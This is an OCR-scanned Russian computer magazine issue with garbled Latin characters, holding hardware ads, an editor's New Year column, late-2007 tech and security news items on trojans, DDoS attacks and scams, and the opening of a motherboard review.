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Новая скорость, 
новые возможности. 




-;!■ Многофункциональный домашний компьютер 



Необходимые аксессуары для компьютера 




Счастливые обладатели компьютера БІаПМазІег 
Мадпит ЕХЕ на базе процессора Іпіеі® Соге™2 Оиаб 
не теряют времени зря. Они работают с различными 
программами, рисуют, изучают языки, играют, разви- 
вают математические способности и обучаются мно- 
гим другим полезным вещам! 




$іаг(Ма$іег Мадпит ЕХЕ С2Д6600 

Іпіеі® Соге™2 йиасі 06600/1 Г6/250Г6/86003Т 256Мб/500ШѴО±Ш 



Внешний накопитель 
ѴѴезІегп Оідііаі Раззрогі 

2.5"/250Г6/и5В2.0/питание от порта ІІЗВ/ 
программа синхронизации и шифрования 



Рулевое колесо с 
эксклюзивным дизайном! 



Руль 

І.одіІесІі МОМО Васіпд 

Гоночный руль с системой обратной связи 
по усилию, ручным переключением скоростей 
и педалями. 







Мост ѴШ & 

ретранслятор до 54 МЬр$ 



Точка доступа 
ТВЕМпеІ ТЕѴѴ-430АРВ 

Работает в режиме точки доступа, клиента 
точки доступа или беспроводного моста Ѵ\Ш$ / 
повторителя. Дистанция покрытия до 300 метров. 







Сеіегоп, Сеіегоп Іпзісіе, СепТгіпо, СепТгіпо Ьодо, Соге Іпзісіе, Іпіеі, Іпіеі Ьодо, Іпіеі Соге, Іпіеі Іпзісіе, Іпіеі Іпзісіе Ьодо, Іпіеі Ѵііѵ, Іпіеі ѵРго, Ііапіит, Ііапіит Іпзісіе, Репііит, Репііит Іпзісіе, Хеоп, и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые 
принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 




СЕТЬ МАГАЗИНОВ 



” ѵталллвіагітазіег.ги 



Сеть магазинов цифровой электроники СтартМастер: 



Москва * Московская область > Санкт-Петербург 
Ростов-на-Дону ■■■ Новосибирск :■ Новокузнецк ■■■ Барнаул 
Кемеровская область > Алтайский край 

Адреса магазинов уточняйте на иютѵ.віагітавіег.ги или по телефону единой справочной. 



Ш Й В в @ 



ѵѵѵѵѵѵ.зіаіітазіег.ги интернет - магазин 

іпІо@5ІагІтазІег.ги ѴѴѴѴѴѴ.ЗГП.Ш 



Большой выбор компьютеров, ноутбуков, фото- и видеотехники, телевизоров, шрЗ, мобильных телефонов. 










ІШКО 



НОВЫЙ ГОД - ЗАБАВНАЯ ШТУКА. 
ПОСУТИЧТО?УСЛОВНОСТЬ, 

ВСЯ ТРЕПЕТНАЯ И ТЕПЛАЯ 
АТМОСФЕРА КОТОРОЙ - НЕ ЧТО 
ИНОЕ, КАК ПРИВИТЫЕ С ДЕТСТ- 
ВАОЩУЩЕНИЯ ПРАЗДНИКА ОТ 
ДНЯ, КОТОРЫЙ НЕ ПОХОЖ НА ВСЕ 
ОСТАЛЬНЫЕ. С ТОЧКИ ЗРЕНИЯ 
АСТРОНОМИИ, ОБЩЕПРИНЯТОЕ 
ПОНЯТИЕ ГОДА - ЭТО ВСЕГО 
ЛИШЬОДИНИЗМНОГИХСПОСО- 
БОВ СДЕЛАТЬ ВРЕМЯ ПЕРИОДИ- 
ЧЕСКОЙ ЕДИНИЦЕЙ. 



Если поискать в ѴѴІкіресІіа, можно найти 
целых 1 1 различных определений, что 
такое год: 



346,620047 дня 



у — драконическии год, 

промежуток времени, по истечении 



которого Солнце возвращается ктому 
же узлу лунной орбиты. 

щ — лунный год, 12 лунных 
месяцев; средняя длина года в лунных 
календарях. 

Щ — средний тропиче- 
ский год (усредненный по всем точкам 
эклиптики промежуток времени, в 
течение которого Солнце возвращается 
в прежнюю позицию относительно эк- 
липтики и земного экватора) недалеко 
от 2000 года. 

М — средний тропический 
год на эпоху 1900. 

щ — средняя продол- 
жительность года в новоюлианском 
календаре. 

Н — промежуток времени 
между двумя весенними равноденствиями. 



365,2425 дня 



у — средняя продолжитель- 
ность года в григорианском календаре. 

щ — юлианский год, средняя 
продолжительность года в юлианском 
календаре; равен 31 557 600 секунд. 

Щ — сидерический (звезд- 
ный) год; период обращения Земли 
вокруг Солнца относительно неподвиж- 
ных звезд. 

щ — аномалистический 
год, промежуток времени между двумя 
последовательными прохождениями 
Земли через перигелий. 

щ— 13 лунных месяцев; висо- 
косный год в некоторых лунно-солнеч- 
ных календарях. 



Поэтому предлагаютебе не запари- 
ваться и не участвовать во всеобщем 
предновогоднем замесе, который 
легко заметить по дракам в очередях 
за подарками, бухлом и новогодними 
турами в Египет. В конце концов, ты 
всегда можешь отдельно отпразд- 
новать сидерический Новый год. 
Приятель, самое главное в Новом году 
— это прекрасные 10 выходных дней, 
которые нам дарованы нашим расщед- 
рившимся государством. Вот это и есть, 
как мне кажется, самое главное. Желаю 
тебе хорошо отдохнуть, и до встречи в 
новом году! 



пікііогг, главред «Хакера» 
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Обо всем за последний месяі_ 





УоиТиЬе обвиняют 
в бездействии 

Какое-то время назад на УоиТиЬе пользователем 5Шгт§еІ8І:89 было 
опубликовано видео Іокеіа Ні§Ь ЗсЬооІ Маззасге, в котором демон- 
стрировалась фотография школы в Финляндии, а затем фотографии 
неизвестного молодого человека, направляющего в камеру пистолет. 
Все это сопровождалось агрессивным треком 8ігау Виііе* группы КтМт. 
На следующий день после появления видео автор ролика, «готовый сра- 
жаться и умереть ради своей цели — очистить человеческую расу от всех 
недостойных представителей», пришел в школу и из пистолета 22-го 
калибра открыл огонь по всем, кто попадался ему на глаза. В резуль- 
тате он подстрелил семерых школьников и директора школы, которая 
пыталась поговорить с ним и остановить кровопролитие. После этого 
он предпринял попытку самоубийства посредством выстрела в голову, 
но промахнулся и только ранил себя. Позже преступник скончался в гос- 
питале от потери крови. Оружие, кстати, он совершенно легально купил 
в магазине. После этих событий в администрацию УоиТиЬе посыпались 
обвинения, суть которых сводится к тому, что, вовремя адекватно отреа- 
гировав на содержание указанного ролика, они могли предотвратить 
трагедию. 

Честно сказать, на УоиТиЬе подобных видеороликов появляется несколь- 
ко штук в месяц, а сколько видео загружается ежедневно, вообще пред- 
ставить сложно. И уж точно администраторам есть чем заняться: они 
удаляют порнографию, насилие и видео, нарушающее авторские права. 



Доменное имя гесусіе.со.ик было продано за фоі/ ТЫСЯЧ . Это самая крупная 
сделка за историю зоны .со.ик. 



Леопард затроянен 

В интернете давно идут споры о безопасности операцион- 
ной системы Мае 05 X. Недавний выход новой версии 
10.5 Ьеорагб вызвал много критики со стороны экспертов 
по безопасности: логика работы встроенного файрвола не 
всегда понятна и он пропускает соединения, которые долж- 
ны были быть блокированы. Но такое положение вещей 
обещали исправить ближайшим патчем. А вот другой миф 
— об отсутствии троянов и вирусов — попытался развеять 
свеженький троянец-эксклюзив для Мас-платформы. Имя 
ему ОЗХ.К5Р1и§.А Тку ап Ногзе и водится он, как и боль- 
шинство троянов, на порносайтах. Когда пользователь 
пытается просмотреть ролик с новенькой порнушкой, появ- 
ляется окно с сообщением о том, что якобы не хватает коде- 
ка и надо бы подгрузить новый. Пользователь соглашается, 
система что-то скачивает и предлагает ввести пароль рута 
для установки кодека в систему. После успешного выпол- 
нения этого требования у трояна появляются достаточные 
права, чтобы подменить 0И5-серваки на левые, которые 
форвардят на подставные сайты при попытке зайти на еВау, 
Раураі и другие известные сервисы. Так и воруются пароли 
к аккаунтам. Появление этого троянца поставило вопрос 
о том, что же считать трояном, — ошибки системы он не 
использует, и пользователь сам передает ему все права. 




В Московской области пират получил О ГОДЯ, условно 
за хранение с целью продажи 437353 пиратских 

БѴБ-дисков. 
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Начинается всё с музыки 




Включайся ► 





ІМСЭКІА 

Соппесііпд Реоріе 




Нокіа 5310 

Хрге$5Ми$іс 

Достаточно нажать РІау* 
чтобы всё закрутилось под 
твою музыку. С Иокіа 5310 
Хрге55Ми5іс это так просто. 
Подключаешь любимые 
наушники через разъём 
3,5 мм, выбираешь 
композицию под настроение. 
Если настроение меняется 
часто - не проблема, 2 Гб 
памяти позволяют хранить 
сотни записей. 

Тонкий и лёгкий корпус 
с алюминиевой отделкой . 
не оставит тебя равнодушным. 
Осталось только выбрать 
- цвет - красный или синий. 



ѵѵѵѵѵѵ.покіа.ги 






АпсІгоісІотОоодІе 



Много ходило слухов о так называемых «гуглофонах» 
— телефонах от компании Соо§1е. Предполагалось, 
что они не будут иметь С5М-модуля и работать будут 
исключительно через ѴѴі-Рі. И вот объявлен выход 
первого гуглофона, правда от компании НТС. В следу- 
ющем году компания планирует выпустить телефон 
Эгеат, основанный на мобильной платформе Апбгоіб 
от Соо§1е. Эта платформа составит прямую конкурен- 
цию ѴѴіпбоѵѵз МоЪіІе и ЗутЬіап. Сам же Огеат будет 
напоминать Арріе іРЬопе — главным достоинством 



телефона называют большой сенсорный дисплей, 
способный распознавать длительность нажатия. В от- 
личие от «яблочного» конкурента, НТС не откажутся 
от клавиатуры полностью и оснастят свой телефон 
^VVЕКТУ-клавой. В качестве преимуществ платфор- 
мы называют большое число веб-приложений, кото- 
рые позволят пользователю использовать возмож- 
ности Сети в полном объеме. Можно предположить, 
что в телефон попадут многие из онлайн-сервисов 
Соо§1е. 




С1ЛЭЧОЮ 




Годовой прирост пользователей интернета в России достиг . По этому показателю 

Россия вышла на первое место среди европейских стран. 




Домены кончаются 

Потихоньку начинают подходить к концу домены в популярных 
зонах. Первой в этом своеобразном соревновании стала зона .сот, в 
которой закончились все четырехбуквенные домены типа хххх.сот. 
Всего доменных имен из четырех букв латинского алфавита 456 976. 
Еще 1 октября было свободно 25 тысяч имен, а в начале ноября уже ни 
одного. Последними были зарегистрированы домены типа xѵ^§.сот, 
ѵхкхрсот, ^ѵx§.сот, хѵвд.сот, ѵx^Есот. Кому такие домены могут 
понадобиться — неизвестно, но киберсквоттеры очень радовались, 
когда они им доставались. Зона .сот существует 22 года, и первыми 
зарегистрированными доменами из четырех букв были ссиг.сот и 
^иасі.сот. Несмотря на то что в зоне .ги доменов зарегистрировано в 70 
раз меньше, чем в зоне .сот, но все более-менее приличные и осмыс- 
ленные имена из четырех букв там тоже уже раскуплены. Что касается 
трех- и двухбуквенных имен, то последние в зоне .ги закончились еще в 
2003 году, а трешки — около двух лет назад. Кстати, средняя стоимость 
двухбуквенного имени колеблется от 8 до 20 тысяч долларов. 



Самым крупным іоггепі-трекером в мире является ійерігаіеЪау.ог^. В нем насчитывается 

около 5 ? 2 миллиона, пиров и 650 ТЫСЯЧ торрентов. 



Г игантский дисплей 

Компания МКзиЬізЫ Еіесйіс представила самый большой в мире пано- 
рамный дисплей. Он состоит из 17 пар синхронизированных дисплеев с 
обратной проекцией и диагональю 170 сантиметров у каждого. Общая 
высота дисплея составила почти 2 м, а диаметр — 7,5 м. Гигант имеет пол- 
ное разрешение 27 миллионов (1024x768x34) пикселей и предоставляет 
зрителю 340 градусов обзора. Производство дисплея обошлось компании 
в 150 миллионов иен (1,35 миллиона долларов). Заказчику, который 
захотел остаться неизвестным, этот «малыш» будет передан в начале 
2008 года. Для каких целей его будут использовать, также не раскрывает- 
ся. В дальнейшем компания предполагает выпускать подобные дисплеи 



Л МІТ51ІВІЗНІ 

для систем виртуальной реальности. Только для создания эффекта вир- 
туальной реальности двух метров в высоту явно недостаточно. Пора уже 
задуматься о разработке практически полных сфер из дисплеев — вот это 
будет круто ! А особенно круто будет играть на таких дисплеях в Контру! 
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Непревзойденная четкость и качество изображения 

игры * фото • видео 





Ілрн 



ЗАЧЛИСЬ СО СТАРЫМ КОМПЬЮТЕРОМ? 
ПРИШЛА ПОРА СМЕНИТЬ ПАРТНЁРА! 



<КкЬІ ѵв+4+ьі, 



■ьы 



■ Игры: Пфздое И^ЧОБО гдаи*(ГІ«ёрЭТі 4 Г МП>,- В 



■ <&№ СигнАГ:,, I И-вСЖПрИГрОСМОіречфЮ!^ фОТфЗф** 



* Видео; Смотри олцва Бьчхжога (йзрвшвнив и МО т ЛЛ 



Нужна другая причина? Подготовься к ѴѴіпсіоіѵв Ѵізіа м - купи сертифицированную 

видеокарту АТІ Яедеоп™ уже сегодня. 




АТІ Яагіеап іи XI 500 

Гі"І I іагп-і '■ К ЗНТі ИТсгг-»*’ 

и і» у| Ѵі гч я , !і;і іі Щ' р ^НТь 
»<Х 7 М ІІЬМІГ’ІШ л (*33 Іч-Ірі" 




АТІ Нагіе ол™ XI 300 

ЛП ^Тѵіі'Гі ’ ‘XI ГІ 1“Ш|П'а гі 

■ аі «*, 1 |.лрь# 4 ^*» 
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ѴММ.Ѵ ОРС.РІЦ в(4Эй)775-75е& 
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Свидания вслепую 

Свидания вслепую потихоньку приходят и в интернет. Сайт 
сгагѵЫішісІаЕе.сопі — один из первых на этом поприще. Его посетители 

— это люди, которые не хотят знать, как выглядит человек, с которым 
они, возможно, встретятся, где он работает и чем увлекается. Им 
достаточно знать только базовую информацию. Но и ее тоже не мало 

— это имя, возраст, пол, рост, религия, телосложение, раса, образова- 
ние и отношение к курению. Есть еще фотография, но качество ее на- 
столько плохое, что лучше бы ее совсем не было. Чтобы свидание состо- 
ялось, необходимо выбрать город (пока представлено только четыре 
американских), несколько районов и промежутки времени, в которые 
возможна встреча. Далее предлагается указать желаемые параметры 
партнера для свидания и ждать сообщения по электронной почте. 
Разрешается даже взять с собой храброго друга, если одному идти на 
свиданку стремно. В русском сегменте интернета подобных проектов 
пока нет, но, наверняка, такое положение вещей скоро изменится. 



По слухам, Бі^.сот в ближайшее время будет продан за 

$300-400 МИЛЛИОНОВ. Будущий обладатель пока неизвестен, но 

потенциальными покупателями считают №ѵѵУогкТітез и ѴѴазЫп^Шп Розі. 




АІ5ІК ВДЪК аѴі ЕМ 

Сгагу ВІІлгі ІЭаІе 




«К сожалению, мы 
в него не играли...» 

У игры Раііоиі 3 судьба не из легких. Сначала распустили Віаск 
Ізіе ЗШсііоз, потом разорилась ІпГегрІау, не успев доделать игру. 
Сейчас разработкой третьей части занимается ВенЬезба. Но, как 
выяснилось, предыдущие части в команде разработчиков не очень 
популярны. Вот как ответили некоторые разработчики на вопрос: 
«Играли ли Вы в РаІІоиН?»: 

Джош Джонс, ведущий дизайнер персонажей: «Нет». 

Кристофер Крайц, ведущий специалист по С^А: «Я довольно много 
играл в РаИоиС 1, хотя и не прошел его ни разу. До РаІІоШ: 2 так и не 
добрался». 

Брендон Энтони, программист: «Таки знал, что спросите. Нет, по 
правде сказать, не играл. Но знаете что, даю обещание исправиться!» 
Меган Сойер, епѵігоптепі: аПтзИ: «Странное дело, но не играла, пока 
мы не приобрели на нее лицензию. Но потом мне очень понрави- 
лось, серьезно, я просто полюбила все, что они там сделали. Этот 
маленький буклет и все остальное — просто круто. Я не прошла до 
конца ни одну из частей. Не то чтобы неинтересно было, просто у 
меня плохо получается проходить игры». 

Что это может значить для поклонников серии? Вероятно, самое 
худшее, что может произойти, — будут потеряны уникальный стиль 
и атмосфера игры. Конечно, нельзя сказать, что игра обречена на 
полный провал, но довольно сильно отличаться от предыдущих 
частей она будет наверняка. 



С№і №імгогкз продала фотосайт ННЯПН за $45 миллионов . Три года назад он 
был куплен аж за $70 миллионов! 
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Осенние й0о5 



Потоковый процессор 



Прошедший месяц 
был щедр на БПоЗ- 
атаки. Сначала был 
атакован известный 
цитатник ЪазЬ.огЕ.ги . 
Несколько дней сайт 
был недоступен, а его 
создатели пытались 
отбиться от распреде- 
ленной атаки. Кстати, 
безуспешно. С тех пор 
на главной странице 
красуется надпись, что это официальное зеркало и что его уже фиг по- 
ломаешь. Какие-либо комментарии по поводу того, кто стоит за атакой 
и чем она могла быть вызвана, владельцы сайта давать отказались. Дру- 
гой жертвой ОБоЗ’а стал официальный сайт «Союза правых сил». Эта 
акция благополучно продолжила серию предвыборных политических 
разборок в интернете. Лидер СПС Никита Белых заявил, что за атакой 
могут стоять российские власти. «Я не хочу никого обвинять, мне просто 
кажутся очень неслучайными совпадения, когда у нас изымаются и 
арестовываются тиражи газет, когда наши сотрудники задерживаются, 
когда падают наши сайты, звучат угрозы с разных сторон, — сказал 
Белых. — Может быть, это совпадение, но это совпадение кажется мне 
странным». Не знаю, как ты, но лично я себе не могу представить, как 
российские власти впаривают троянцев с целью насобирать себе ботнет 
для очередного ЭПоЗ’а. . . 



Компания А1ѴГО анонсировала новую разработку — первый в мире 
потоковый процессор. Это графический чип (СРІІ) под названием 
РігеЗигеат 9170 Зігеат Ргосеззог. Он основан на разработках компа- 
нии АТі. Разработчиками гарантируется двойная точность вычис- 
лений с плавающей запятой, что важно для научных и инженерных 
расчетов. Процессор построен по 55-нм техпроцессу и содержит 
320 ядер. Согласно официально приведенным характеристикам, 
производительность достигает 500 гигафлопс (для вычислений с 
одинарной точностью) . При этом потребляемая мощность не превы- 
шает 150 Вт. Процессор размещается на плате с интерфейсом РСІе 2.0 
х16 и 2 Гб СЭПИЗ-памяти. Плата будет продаваться вместе с ЗЭК по 
цене 1999 долларов уже в начале 2008 года. Работать с ней можно из 
под ѴѴіпсіо\ѵ5 ХР или Ілпих. Поддерживаются как 32-, так и 64-битные 
платформы. Для сравнения производительности приведу некоторые 
интересные значения: 

ІпСеІ Соге 2 Био 2,4 ГГц (2006) — 1,3 Гфлопс, 

Суперкомпьютер А5СІ Кеб (1993) — 1 Тфлопс, 

Зопу РІауЗіаііоп 3 — 2 Тфлопс, 

Суперкомпьютер 5Х-9 производства ЫЕС (2007) — 839 Тфлопс. 

АМ0Л1 
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ІНОО МТ 5.1 В 



1 Большая суммарная 
мощность - 140 Вт 



■ 5.1 - и стереовходы 

■ Процессор Рго 1_одіс 
для стереосигнала 

■ Полнофункциональный 
пульт ДУ 
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Информация о товаре по телефону: 

+7 ( 495 ) 22 - 33 - 44-5 

Адрес технической поддержки: 

іп{о@зѵеп.ги 

На правах рекламы 









ІСамой популярной на сегодняшний день операционной 



іѴ УІПСІОЛ/Ѵ5 ХР 
6 летя 

45 нанометров уже здесь 

Компания Іпіеі объявила о выпуске первого процессора, изготовленного по 
техпроцессу 45 нм. Он имеет простое имя 0X9650, четыре ядра и частоту 3,0 ГГц. 
Помимо этого, до 12 Мб увеличен кэш второго уровня и добавлен новый набор из 
47 инструкций 53Е4. Последние должны повысить производительность НИ-видео. 
Процессор построен на архитектуре Репгуп, а частота шины составляет 1333 МГц. 
Применение 45-нм техпроцесса позволило значительно сократить энергопотреб- 
ление — 0X9650 жрет электричества на 60 Вт меньше, чем его предшественник 
0X6850. В продаже процессор появится к концу года, но распространение получит 
в начале следующего. После Репгуп ожидается появление архитектуры ИеЬаІет, 
которая также будет основана на 45-нм техпроцессе. Широкой публике ее предста- 
вят в конце 2008 года, она будет иметь поддержку БЭКЗ и восемь ядер. После 45-нм 
будет 32-нм техпроцесс. Он ляжет в основу архитектуры ѴѴезШіеге (Иекаіет-С), 
выход которой анонсирован на 2009 год. 



исполнилось 



системе 



«До свидания» от МісгозоН 



Специалисты из МісгозоЛ решили помочь тем людям, 
которые при общении по интернет-пейджеру забывают 
перед уходом написать прощальное сообщение. И 
недолго думая подали заявку в патентное агентство 
США. В заявке описана система автоматической 
отправки прощального сообщения при закрытии 
окна разговора в ІМ-мессенджере. Предполагается, 
что она будет посылать не универсальное сообщение, 
а месседж, сгенерированный в результате анализа 
контекста конкретной беседы, которую необходимо им 
завершить. В зависимости от контекста он сможет как 
содержать имя собеседника, так и просто состоять из 



одного слова «Вуе». На словах все хорошо, но есть неко- 
торые проблемы. Во-первых, подобное сообщение уже 
давно посылается в ІКС, когда человек уходит с канала. 
Во-вторых, если эта система будет реализована, окно 
переписки придется держать открытым, иначе пейджер 
за нас попрощается. Я вот не всегда держу все окна 
переписки открытыми, что отнюдь не означает, что я 
завершил общение с теми, чьи окна я закрыл. Но все это 
пока находится лишь в стадии работы над патентом. 

Его еще никто в жизнь не воплотил, и не исключено, что 
это воплощение будет довольно сильно отличаться от 
первоначальной идеи. 
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Как разводят на деньги честных юзеров Винды 



Что только не придумают любители легкой наживы, чтобы вытянуть 
пару долларов у законопослушных граждан. В этот раз злобные 
хацкеры сыграли на честности тех, кто готов платить деньги за 
операционную систему. Сидит вот простой пользователь легально- 
го софта за компьютером, работает. И вдруг на экране появляется 
надпись, что при проверке подлинности Винды было обнаружено, 
что эта самая Винда абсолютно пиратская, и потому компьютер 
будет заблокирован. Для разблокировки предлагается два варианта 
действий: ввести серийник, написанный на коробке, или заплатить 



немножко денег — всего-то 300 рублей. Совсем недорого для опера- 
ционной системы :). Но придирчивого юзера должен насторожить 
как стиль, в котором написано сообщение («Нажмите на кнопку с 
ключиком» не очень похоже на сообщение от Микрософт), так и не 
тот способ оплаты, к которому привыкли мелкософтовцы, — Ян- 
декс. Деньги. Причем оплатить рекомендуется через терминалы 
моментальной оплаты :). Это нам с тобой смешно, а простой юзер, у 
которого заблокировался компьютер с важной и срочной работой, 
вполне может пойти и оплатить. 
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Мобильная глушилка 

В Америке начался бум портативных устройств, которые глушат сигналы мобильных 
телефонов. Несмотря на то что официально такие устройства на территории США не 
продаются, поставщики говорят о сотнях заказов в месяц именно из Штатов. Поку- 
пают их все кому не лень: владельцы магазинов, парикмахерских, водители автобу- 
сов и просто люди, часто пользующиеся общественным транспортом. Стоят такие 
устройства не очень дорого и глушат телефоны в радиусе 10 метров или больше. Есть 
как переносные и не очень мощные, так и стационарные, способные заглушить целое 
здание. Карманные устройства работают непостоянно и по нажатию кнопки излучают 
короткий импульс, который обрывает разговоры. Если рост ажиотажа вокруг таких 
устройств продолжится, то нормально поговорить по телефону в общественном месте 
скоро будет сложно. Остается надеяться, что от мощного излучения устройства у его 
владельца будет звенеть в голове и из последней выпадут все волосы. Ознакомиться 
с примерным ассортиментом глушилок можно на сайте Ьйр: //рЬопеіагптег.сот . 
Советую не увлекаться. 




$22 миллиардов! 



Снова тупой 



В далеком 1950 году Аланом Тьюрингом был 
предложен тест, на основании результатов 
которого компьютер может быть признан 
разумным. В ходе этого теста судьи обменива- 
ются с компьютером сообщениями и должны 
определить, человек с ними общается или 
машина. На основании этого теста ежегодно 
проходит конкурс, организованный в 
1990 году Хью Лебнером. Проходит он в виде 
соревнования с главным призом в 100 тысяч 
долларов. Еще ни разу ни один компьютер 
не был признан разумным. Чуда не произош- 
ло и в этом году — больше половины судей 



безошибочно определили тупую железку в 
каждом из участников (если их можно так 
назвать :)) . Но без призов все равно дело не 
обходится — традиционно удачнее всех ко- 
сящей под человека системе дают бронзовую 
медаль и приз в 2 тысячи баксов. В этом году 
таковой была признана система іЛіга Наі от 
американской компании 2аЬа\ѵаге. Вообще, 
эта программа способна не только общаться 
в чате — она также распознает голос и может 
служить в роли личного помощника, напоми- 
ная о встречах и делах, набирая телефонные 
номера и делая другие не менее важные дела. 
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Но максимальная продолжительность ролика осталась прежней — 



ІГбі 
10 минут 



Закладка-светильник 

Индийский дизайнер Авниш Гаутам придумала оригинальную закладку 
для книг, которая позволит не только быстро найти нужную страницу, но 
и с комфортом читать в местах со слабым освещением. Закладка пред- 
ставляет собой прозрачную пластинку, выполненную на основе гибких 
органических светодиодов РОЫЮ (ПехіЫе ог^апіс етіШп§ сНобез) . 

Благодаря этим светодиодам букмарка может подсвечивать часть книги 
под собой приятным белым светом. Сейчас существуют специальные 
диодные лампы для чтения, но при их использовании создается очень 
большой контраст между ярко освещенной поверхностью книги и 
темным фоном, что вредно для глаз. Кстати, читать с яркого экрана 
ноутбука в темноте вредно по этой же причине, поэтому ставь яркость 
на минимум. Использование новой закладки, которая получила имя 
МАКК, не навредит глазам читающего и не потревожит покоя человека, 
который спит под боком. Из дополнительных возможностей присутству- 
ет только регулировка степени яркости подсветки. О стоимости и сроках 
поступления в продажу пока ничего не известно. 
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Подстава на МуЗрасе 

Интересный способ впаривания троянов придумали китайские взломщики — они использовали 
страницы популярных музыкальных исполнителей на Мѵ5расе.сош . Специалист по безопаснос- 
ти из Ехріоіі: РгеѵепГіоп ЬаЬз Роджер Томпсон исследовал страницу популярной певицы Аіісіа 
Кеуз. В код страницы был внедрен тэг бэкграундной картинки большого размера (8000 на 
1000 пикселей), который по любому клику на любой части страницы отправлял пользователя 
на китайский сайт. После этого появлялось сообщение, что у пользователя не хватает кодека 
для воспроизведения контента и ему необходимо его скачать и установить. Понятное дело, что 
скачивался при этом далеко не кодек. Благодаря тому что на странице музыкальных исполни- 
телей полно разного видео и аудио, вероятность того, что пользователь хотел попасть именно 
на них, довольно велика. Пока остается неизвестным, как хацкерам удается внедрять свой код 
в чужие страницы. Официальных комментариев от МуЗрасе тоже не было. Томпсон связывает 
этот способ внедрения троянов с недавно появившимся трояном для Макинтошей, поскольку в 
обоих случаях предлагается скачать кодек и троян заменяет адреса ПЫЗ в системе пиратскими. 

Просто совпадение 

Доктор Лоуренс Робертс (Ьашгепсе КоЪегТз), один из основателей 
сети АІШШЕТ (которая, если ты забыл, потом превратилась в 
ІпГегпеі:), предсказывает глобальный кризис всей Сети. Дело 
в том, что объемы трафика в интернете растут очень быстро и 
современные каналы связи скоро просто не выдержат. Частич- 
но проблему решило внедрение оптоволоконных линий, но 
технологии пакетной маршрутизации не менялись уже десятки 
лет и могут стать слабым звеном при дальнейшем расширении 
Сети. Простая математика показывает, что объемы трафика за 
год увеличиваются примерно вдвое, а пропускная способность 
маршрутизаторов, согласно закону Мура, удваивается только раз 
в 18 месяцев. Это якобы доказывает, что без новых маршрутиза- 
торов жить дальше будет просто невозможно. Но — о чудо ! Ком- 
пания Апа§гап предлагает свою новую разработку — поточные 
маршрутизаторы (Поѵѵ-Ьазеб гоигіп§), которые как раз и решат 
эту медленно надвигающуюся проблему. По невероятному 
стечению обстоятельств дедушка Лоуренс является основателем 
и директором этой компании. 
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Слишком жестоко 



Не угасают скандалы вокруг игры МапЪипИ 2, выпущенной 
Коск&аг Сатез в конце октября. Сначала ей присвоили 
рейтинг Айіійз Опіу, а компании Місгозоіі:, ИтИепсіо и 5опу 
категорически против появления игр с таким рейтингом на 
их платформах. Потребовалось несколько месяцев, чтобы 
выйти из этой ситуации: особо жестокие сцены убийств 
теперь показываются не в фокусе и с помехами. Этого хва- 
тило, чтобы понизить рейтинг до МаШге (старше 17 лет), и 
игра поступила-таки в продажу. Но упрямые геймеры рас- 
курочили версию для Р5Р, научились отключать фильтры и 
вовсю наслаждаются «нефильтрованным» насилием. Этого 
оказалось достаточно, чтобы крупнейшая сеть розничных 
магазинов Таг§е1 отказалась продавать игру как для Р5Р, 
так и для других платформ. Честно говоря, графика в игре 
не очень, особенно на Р5Р. Что за «ужасающие» сцены мож- 
но разглядеть при таких обстоятельствах, непонятно. Но 
все идет к тому, что скоро игру будут продавать в магазинах 
для взрослых наравне с презервативами и надувными 
женщинами. 
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Изменчивый Отаіі 



Почтовый сервис Стай потихоньку развивает- 
ся и дополняется новыми функциями. Недавно 
была добавлена ожидаемая многими функция 
работы с почтой по протоколу ІМАР. Главное его 
отличие от РОРЗ состоит в том, что все измене- 
ния, сделанные с почтой через десктопные при- 
ложения типа ОіЛІоок или ТЬипбегЫгб, теперь 
полностью сохраняются на сервере. По РОРЗ, 



даже если банально забрать почту с сервера, а 
потом зайти через веб-интерфейс, все сообще- 
ния будут помечены как непрочитанные. Еще 
одна важная возможность — получение почты 
десктопным клиентом сразу после того, как 
она появилась на сервере. Сейчас приходится 
выставлять малое время проверки почты, что- 
бы не пропустить срочного письма. При этом 




минуту или 

даже чаще должен ломиться на сервер и прове- 
рять состояние ящика. Пока ІМАР доступен не 
для всех, но со временем эта функция появится 
в меню настроек у всех пользователей Соо§1е 
Май. 
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КИРИЛЛ АВРОРИН 

6 СПОСОБОВ 
СЭКОНОМИТЬ 

ОБЗОР ШЕСТИ МАТЕРИНСКИХ ПЛАТ С ИНТЕГРИРОВАННЫМ ВИДЕО 

Умные люди говорят: «Сэкономить — значит дважды заработать». 

Материнские платы с интегрированным видеоадаптером существуют уже много лет. О 
они были настоящим откровением: специалисты им приписывали будущее, а продавцы — еще 
нолики на ценниках. Но проведенные тесты показали массу недостатков первых моделей, и 
они резко переместились в сектор Іош-епсі. И они бы там так и оставались, если бы не всеобщая 
миниатюризация, появление ЬагеЬопе-компьютеров и мобильных процессоров. Если ноутбук 
могли себе позволить не все, то ничто не мешало собрать мини-компьютер. Достаточно было 
приобрести компактный корпус, установить туда материнку, процессор, память и жесткий диск 
— и, как говорится, ріиу’п’ріау. Мода на подобные системы дала бюджетным интегрированным 
материнкам вторую жизнь: детские болезни уже давно не беспокоят пользователей, список 
моделей постоянно пополняет новинками, а среди них нередко попадаются весьма интересные 
экземпляры, совмещающие в себе приличную производительность и небольшие размеры. 



В МЕТОДИКАТЕСТИРОВАНИЯ 

Собрав тестовый стенд, мы прогоняли стандарт- 
ный набортестовых программ. Больше внимания 
уделялось пакету общей оценки системной 
производительности — РС Магк’05. На всякий 
случай коротенько гоняли и ЗОМагк’ОЗ — брать 
более свежую версию не было никакого смысла, 
так как производительность встроенных видео- 
адаптеров и старичка 2003 года выпуска обра- 
батывает-то без особенного энтузиазма. Чтобы 
проверить быстродействие системной шины и 
памяти, мы прогоняли бенчмарк, встроенный в 
известный архиватор ѴѴіпРАР. 

Соответственно, с помощью этихтрех пакетов 
можно оценить производительность как всего 
компьютера в целом, так и ключевых его со- 
ставляющих. Целенаправленное тестирование 
в играх не производилось — как я уже говорил, 
не стоит делать высокую ставку на интегриро- 
ванные видеоадаптеры. Будет неплохо, если их 
мощности хватитхотя бы для игр того же возрас- 
та, что и используемая нами версия ЗОМагк. 



Тестовый стенд: 

Процессор, ГГц: 

АМБ: 2.6, АіЫоп 64X2 5000+, 

Іпіеі: 2.4, Соге 2 йио Е6600 

Кулер: Ріозіоп Сусіопе 

Память, Мб: 2х512СогзаігХМ52 В0П2 1066 

МГц, 5-5-5-15 

Жесткий диск, Гб: 1 00, ѴѴезІегп Оідііаі Бсогріо, 
7200 об/мин, кэш 8 Мб, формат2,5" 

Блок питания, Вт: 435, Нірег 
